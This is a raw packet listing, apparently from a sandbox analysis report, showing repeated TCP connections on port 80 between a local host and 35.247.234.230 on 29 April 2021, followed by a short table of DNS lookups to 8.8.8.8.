Apr 29, 2021 09:19:54.861723900 CEST  80  49788  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:55.080667973 CEST  80  49788  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:55.080882072 CEST  49788  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:55.080991030 CEST  49788  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:55.326512098 CEST  80  49788  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:56.248555899 CEST  49789  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:56.493525982 CEST  80  49789  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:56.493716002 CEST  49789  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:56.496992111 CEST  49789  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:56.741976976 CEST  80  49789  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:56.742147923 CEST  49789  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:56.986974001 CEST  80  49789  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:57.222807884 CEST  80  49789  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:57.222949028 CEST  49789  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:57.223004103 CEST  49789  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:57.469961882 CEST  80  49789  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:57.472218990 CEST  49790  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:57.718179941 CEST  80  49790  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:57.720038891 CEST  49790  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:57.722593069 CEST  49790  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:57.968662024 CEST  80  49790  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:57.968847990 CEST  49790  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:58.214782000 CEST  80  49790  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:58.434159994 CEST  80  49790  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:58.434386015 CEST  49790  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:58.434670925 CEST  49790  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:58.680548906 CEST  80  49790  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:58.687905073 CEST  49791  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:58.933593035 CEST  80  49791  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:58.933970928 CEST  49791  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:58.937624931 CEST  49791  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:59.183419943 CEST  80  49791  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:59.183995008 CEST  49791  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:59.429713964 CEST  80  49791  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:59.738395929 CEST  80  49791  35.247.234.230  192.168.2.3
Apr 29, 2021 09:19:59.738625050 CEST  49791  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:59.738641024 CEST  49791  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:59.963609934 CEST  49792  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:19:59.984191895 CEST  80  49791  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:00.211092949 CEST  80  49792  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:00.211308002 CEST  49792  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:00.214624882 CEST  49792  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:00.460843086 CEST  80  49792  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:00.461215019 CEST  49792  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:00.707374096 CEST  80  49792  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:00.943799019 CEST  80  49792  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:00.943991899 CEST  49792  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:00.944051981 CEST  49792  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:01.190140963 CEST  80  49792  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:01.196347952 CEST  49793  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:01.442156076 CEST  80  49793  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:01.442291975 CEST  49793  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:01.445743084 CEST  49793  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:01.691699982 CEST  80  49793  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:01.691780090 CEST  49793  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:01.937623024 CEST  80  49793  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:02.163347960 CEST  80  49793  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:02.163436890 CEST  49793  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:02.163512945 CEST  49793  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:02.395409107 CEST  49794  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:02.409327984 CEST  80  49793  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:02.641940117 CEST  80  49794  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:02.642080069 CEST  49794  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:02.645327091 CEST  49794  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:02.891582012 CEST  80  49794  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:02.891839981 CEST  49794  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:03.138624907 CEST  80  49794  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:03.360308886 CEST  80  49794  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:03.360435963 CEST  49794  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:03.360481977 CEST  49794  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:03.591964960 CEST  49795  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:03.606765985 CEST  80  49794  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:03.840815067 CEST  80  49795  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:03.841419935 CEST  49795  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:03.844490051 CEST  49795  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:04.092648029 CEST  80  49795  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:04.093413115 CEST  49795  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:04.341648102 CEST  80  49795  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:04.563808918 CEST  80  49795  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:04.563939095 CEST  49795  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:04.564070940 CEST  49795  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:04.812051058 CEST  80  49795  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:04.812714100 CEST  49796  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:05.058578968 CEST  80  49796  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:05.058818102 CEST  49796  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:05.062419891 CEST  49796  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:05.308222055 CEST  80  49796  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:05.308382034 CEST  49796  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:05.554145098 CEST  80  49796  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:05.782468081 CEST  80  49796  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:05.782768011 CEST  49796  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:05.782809019 CEST  49796  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:06.007965088 CEST  49797  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:06.028855085 CEST  80  49796  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:06.252986908 CEST  80  49797  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:06.253092051 CEST  49797  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:06.256647110 CEST  49797  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:06.501732111 CEST  80  49797  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:06.501842022 CEST  49797  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:06.747020960 CEST  80  49797  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:07.193867922 CEST  80  49797  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:07.193984985 CEST  49797  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:07.194047928 CEST  49797  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:07.430721045 CEST  49798  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:07.439404964 CEST  80  49797  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:07.679922104 CEST  80  49798  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:07.679999113 CEST  49798  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:07.682910919 CEST  49798  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:07.931952953 CEST  80  49798  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:07.932044983 CEST  49798  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:08.181077957 CEST  80  49798  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:08.408574104 CEST  80  49798  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:08.408680916 CEST  49798  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:08.408732891 CEST  49798  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:08.624322891 CEST  49799  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:08.659456968 CEST  80  49798  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:08.870332003 CEST  80  49799  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:08.870434046 CEST  49799  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:08.873402119 CEST  49799  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:09.119421959 CEST  80  49799  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:09.119581938 CEST  49799  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:09.366075039 CEST  80  49799  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:09.595613956 CEST  80  49799  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:09.595731974 CEST  49799  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:09.595766068 CEST  49799  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:09.825494051 CEST  49801  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:09.841722965 CEST  80  49799  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:10.075057030 CEST  80  49801  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:10.075167894 CEST  49801  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:10.078578949 CEST  49801  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:10.327928066 CEST  80  49801  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:10.327999115 CEST  49801  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:10.577482939 CEST  80  49801  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:10.799532890 CEST  80  49801  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:10.799629927 CEST  49801  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:10.799680948 CEST  49801  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:11.049326897 CEST  80  49801  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:11.077001095 CEST  49803  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:11.322295904 CEST  80  49803  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:11.322431087 CEST  49803  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:11.328697920 CEST  49803  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:11.574079990 CEST  80  49803  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:11.574177027 CEST  49803  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:11.819205046 CEST  80  49803  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:12.041265965 CEST  80  49803  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:12.043384075 CEST  49803  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:12.043420076 CEST  49803  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:12.288444996 CEST  80  49803  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:12.300704956 CEST  49804  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:12.549582958 CEST  80  49804  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:12.549853086 CEST  49804  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:12.553500891 CEST  49804  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:12.802355051 CEST  80  49804  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:12.802506924 CEST  49804  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:13.051434040 CEST  80  49804  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:13.276144981 CEST  80  49804  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:13.276249886 CEST  49804  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:13.276305914 CEST  49804  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:13.528356075 CEST  80  49804  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:13.558096886 CEST  49805  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:13.803390980 CEST  80  49805  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:13.803615093 CEST  49805  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:13.820240974 CEST  49805  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:14.065732002 CEST  80  49805  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:14.065867901 CEST  49805  80  192.168.2.3  35.247.234.230
Apr 29, 2021 09:20:14.311176062 CEST  80  49805  35.247.234.230  192.168.2.3
Apr 29, 2021 09:20:14.527230978 CEST  80  49805  35.247.234.230  192.168.2.3
                                            Apr 29, 2021 09:20:14.527412891 CEST4980580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:15.212618113 CEST4980580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:15.457886934 CEST804980535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:15.507117033 CEST4980680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:15.751938105 CEST804980635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:15.752120972 CEST4980680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:15.758589983 CEST4980680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:16.003357887 CEST804980635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:16.005445957 CEST4980680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:16.250313044 CEST804980635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:16.469253063 CEST804980635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:16.469500065 CEST4980680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:16.469546080 CEST4980680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:16.714390039 CEST804980635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:16.763376951 CEST4980780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:17.009433985 CEST804980735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:17.009701014 CEST4980780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:17.017693043 CEST4980780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:17.263649940 CEST804980735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:17.263936043 CEST4980780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:17.509773970 CEST804980735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:17.732038021 CEST804980735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:17.732338905 CEST4980780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:17.732379913 CEST4980780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:17.973644972 CEST4980880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:17.978111982 CEST804980735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:18.218794107 CEST804980835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:18.218890905 CEST4980880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:18.222249031 CEST4980880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:18.467719078 CEST804980835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:18.467852116 CEST4980880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:18.712995052 CEST804980835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:19.481174946 CEST804980835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:19.481401920 CEST4980880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:19.481432915 CEST4980880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:19.719295979 CEST4980980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:19.728776932 CEST804980835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:19.964792967 CEST804980935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:19.965055943 CEST4980980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:19.971364975 CEST4980980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:20.216970921 CEST804980935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:20.217267990 CEST4980980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:20.463074923 CEST804980935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:20.682220936 CEST804980935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:20.682432890 CEST4980980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:20.682507992 CEST4980980192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:20.927946091 CEST804980935.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:20.942181110 CEST4981080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:21.187114000 CEST804981035.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:21.187258005 CEST4981080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:21.190798998 CEST4981080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:21.435714006 CEST804981035.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:21.435870886 CEST4981080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:21.680890083 CEST804981035.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:21.917289019 CEST804981035.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:21.917531967 CEST4981080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:21.917623997 CEST4981080192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:22.162494898 CEST804981035.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:22.173717976 CEST4981180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:22.419545889 CEST804981135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:22.419684887 CEST4981180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:22.423304081 CEST4981180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:22.669157028 CEST804981135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:22.669348955 CEST4981180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:22.915258884 CEST804981135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:23.374578953 CEST804981135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:23.374720097 CEST4981180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:23.374744892 CEST4981180192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:23.617644072 CEST4981280192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:23.620421886 CEST804981135.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:23.865509987 CEST804981235.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:23.865618944 CEST4981280192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:23.869111061 CEST4981280192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:24.118285894 CEST804981235.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:24.118428946 CEST4981280192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:24.366374016 CEST804981235.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:24.587765932 CEST804981235.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:24.587941885 CEST4981280192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:24.588047028 CEST4981280192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:24.835819006 CEST804981235.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:24.837981939 CEST4981380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:25.083554029 CEST804981335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:25.083769083 CEST4981380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:25.087244987 CEST4981380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:25.332848072 CEST804981335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:25.335743904 CEST4981380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:25.581329107 CEST804981335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:25.805234909 CEST804981335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:25.805440903 CEST4981380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:25.805521011 CEST4981380192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:26.051002026 CEST804981335.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:26.058578968 CEST4981480192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:26.303813934 CEST804981435.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:26.303966999 CEST4981480192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:26.307610989 CEST4981480192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:26.552906036 CEST804981435.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:26.553095102 CEST4981480192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:26.798273087 CEST804981435.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:27.024369001 CEST804981435.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:27.024471998 CEST4981480192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:27.024559021 CEST4981480192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:27.270360947 CEST804981435.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:27.282170057 CEST4981580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:27.526870012 CEST804981535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:27.528588057 CEST4981580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:27.531953096 CEST4981580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:27.776747942 CEST804981535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:27.778146029 CEST4981580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:28.022852898 CEST804981535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:28.247987032 CEST804981535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:28.248215914 CEST4981580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:28.248351097 CEST4981580192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:28.492919922 CEST804981535.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:28.493227959 CEST4981680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:28.738336086 CEST804981635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:28.738477945 CEST4981680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:28.741976023 CEST4981680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:28.987099886 CEST804981635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:28.987257957 CEST4981680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:29.232291937 CEST804981635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:29.459114075 CEST804981635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:29.459299088 CEST4981680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:29.459326982 CEST4981680192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:29.688451052 CEST4981780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:29.704421997 CEST804981635.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:29.938616037 CEST804981735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:29.938894987 CEST4981780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:29.941660881 CEST4981780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:30.191706896 CEST804981735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:30.191807032 CEST4981780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:30.441932917 CEST804981735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:30.664474010 CEST804981735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:30.664561987 CEST4981780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:30.664594889 CEST4981780192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:30.884326935 CEST4981880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:30.915309906 CEST804981735.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:31.129890919 CEST804981835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:31.130074024 CEST4981880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:31.136632919 CEST4981880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:31.382108927 CEST804981835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:31.382211924 CEST4981880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:31.627712011 CEST804981835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:31.850343943 CEST804981835.247.234.230192.168.2.3
                                            Apr 29, 2021 09:20:31.850486040 CEST4981880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:31.850533009 CEST4981880192.168.2.335.247.234.230
                                            Apr 29, 2021 09:20:32.096031904 CEST804981835.247.234.230192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 29, 2021 09:18:17.005033016 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:17.821192980 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:17.870004892 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:18.743164062 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:18.794708014 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:18.901678085 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:18.958931923 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:19.610761881 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:19.667942047 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:22.090662956 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:22.139344931 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:23.081970930 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:23.131145000 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:27.250777960 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:27.317876101 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:28.277908087 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:28.326469898 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:29.267743111 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:29.319451094 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:30.496064901 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Apr 29, 2021 09:18:30.544826031 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Apr 29, 2021 09:18:31.665183067 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
